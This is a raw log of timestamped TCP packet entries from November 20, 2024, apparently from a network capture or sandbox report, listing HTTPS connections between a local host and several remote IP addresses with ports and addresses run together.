                                                                                                                                                                                              Nov 20, 2024 21:28:23.301057100 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.301155090 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.301213980 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.301222086 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.301268101 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.306009054 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.306158066 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.306202888 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.306225061 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.306252956 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.306261063 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.306312084 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.306324959 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.311269045 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.311343908 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.311357975 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.314024925 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.314110041 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.314172029 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.314181089 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.314224958 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.321470022 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.321479082 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.322045088 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.322066069 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.322542906 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.327094078 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.331767082 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.331819057 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.331826925 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.331868887 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.336559057 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.341839075 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.341908932 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.341916084 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.341960907 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.351965904 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.351974010 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.352046013 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.361996889 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.362030983 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.362095118 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.362144947 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.367755890 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.372081995 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.372183084 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.377178907 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.377262115 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.377957106 CET4434977013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.378036022 CET4434977013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.381998062 CET49770443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.383703947 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.383719921 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.385127068 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.385138988 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.385251045 CET49772443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.385263920 CET44349772141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.386414051 CET49770443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.386426926 CET4434977013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.386436939 CET49770443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.386441946 CET4434977013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.387415886 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.387476921 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.387706995 CET49771443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.387722969 CET44349771141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.392328978 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.392432928 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.392441034 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.392457008 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.392482042 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.392513037 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.394550085 CET49783443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.394553900 CET44349783141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.395442009 CET49773443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.395447969 CET44349773141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.425431013 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.429471016 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.429559946 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.429598093 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.450669050 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.450736046 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.450807095 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.451234102 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:23.451251030 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.454032898 CET4434977513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.454190016 CET4434977513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.454258919 CET49775443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.470235109 CET49775443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.470278025 CET4434977513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.470309019 CET49775443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.470324993 CET4434977513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.472079039 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.472239971 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.472307920 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.475822926 CET4434978845.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.476078033 CET49788443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:23.476088047 CET4434978845.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.476222038 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.476253033 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.476315975 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.477264881 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.477274895 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.477291107 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.477298021 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.477763891 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.477926970 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.479455948 CET4434978845.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.479552031 CET49788443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:23.480031967 CET49788443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:23.480113029 CET4434978845.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.480222940 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.480237007 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.480375051 CET49788443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:23.480381966 CET4434978845.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.480686903 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.480772972 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.481441975 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.481594086 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.482709885 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.482799053 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.482903004 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.489238024 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.489253044 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.493814945 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.493839025 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.494060040 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.495460987 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.495484114 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.495543957 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.495794058 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.495801926 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.495805025 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.495994091 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:23.496001005 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.496124029 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.496136904 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.497693062 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.497773886 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:23.498661995 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:23.498779058 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.498807907 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:23.517767906 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.517848015 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.518033028 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.518660069 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.518702984 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.519577980 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.519603014 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.519706011 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.519886017 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.519897938 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.521296978 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.521330118 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.521447897 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.521608114 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.521619081 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.523591042 CET49802443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.523612022 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.523794889 CET49788443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:23.523835897 CET49802443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.523844004 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.523852110 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.524286985 CET49802443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.524307013 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.539324999 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:23.539347887 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.570437908 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.585202932 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:23.596709967 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.596748114 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.596828938 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.596919060 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.597313881 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.597322941 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.597335100 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.597338915 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.597970009 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.597992897 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.598067045 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.598087072 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.598129034 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.599280119 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.599303007 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.599380016 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.599405050 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.599467039 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.600229025 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.600347996 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.600356102 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.601409912 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.601470947 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.601536989 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.601555109 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.601599932 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.603502989 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.603539944 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.603647947 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.603794098 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.603821993 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.605958939 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.606021881 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.607117891 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.607214928 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.607222080 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.607446909 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.607521057 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.609437943 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.609462976 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.609507084 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.614114046 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.614212036 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.614218950 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.622621059 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.622694969 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.624274969 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.624347925 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.626110077 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.626164913 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.626173019 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.626261950 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.628063917 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.628120899 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.628129005 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.630433083 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.630469084 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.630521059 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.630527973 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.630665064 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.631095886 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.631146908 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.632678986 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.632740974 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.634979010 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.635047913 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.635055065 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.641984940 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.642052889 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.642060041 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.647664070 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.647725105 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.647985935 CET44349787104.16.123.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.648216009 CET44349787104.16.123.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.648274899 CET49787443192.168.2.5104.16.123.96
                                                                                                                                                                                              Nov 20, 2024 21:28:23.648962975 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.649027109 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.649033070 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.654377937 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.654412031 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.654467106 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.655544043 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.655631065 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.656037092 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.656122923 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.656127930 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.663093090 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.663105011 CET49787443192.168.2.5104.16.123.96
                                                                                                                                                                                              Nov 20, 2024 21:28:23.663110018 CET44349787104.16.123.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.663193941 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.663199902 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.669819117 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:23.669888020 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.669967890 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:23.670135975 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.670177937 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.670185089 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.670221090 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:23.670255899 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.677056074 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.677112103 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.677119017 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.695595026 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.728271961 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.728353024 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.728826046 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.739963055 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.740029097 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.740952969 CET44349777199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.741156101 CET44349777199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.741213083 CET49777443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.742187977 CET49777443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.742192984 CET44349777199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.749207973 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.749273062 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.749905109 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.749980927 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.750458002 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.753945112 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.753998995 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.754004955 CET44349785141.193.213.11192.168.2.5
